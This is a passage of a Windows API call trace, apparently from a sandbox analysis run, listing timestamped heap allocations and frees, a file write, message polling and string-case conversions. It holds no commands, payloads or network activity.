[0167.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0167.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0167.983] WriteFile (in: hFile=0x120, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x48, lpOverlapped=0x0) returned 1 [0167.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0167.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.983] CloseHandle (hObject=0x120) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0167.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0167.984] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0167.985] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0167.986] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0167.986] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.986] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0167.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0167.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0167.986] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0167.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0167.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0167.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0167.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0167.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0167.987] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0167.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0167.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0167.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0167.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0167.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0167.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0167.990] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0167.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0167.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 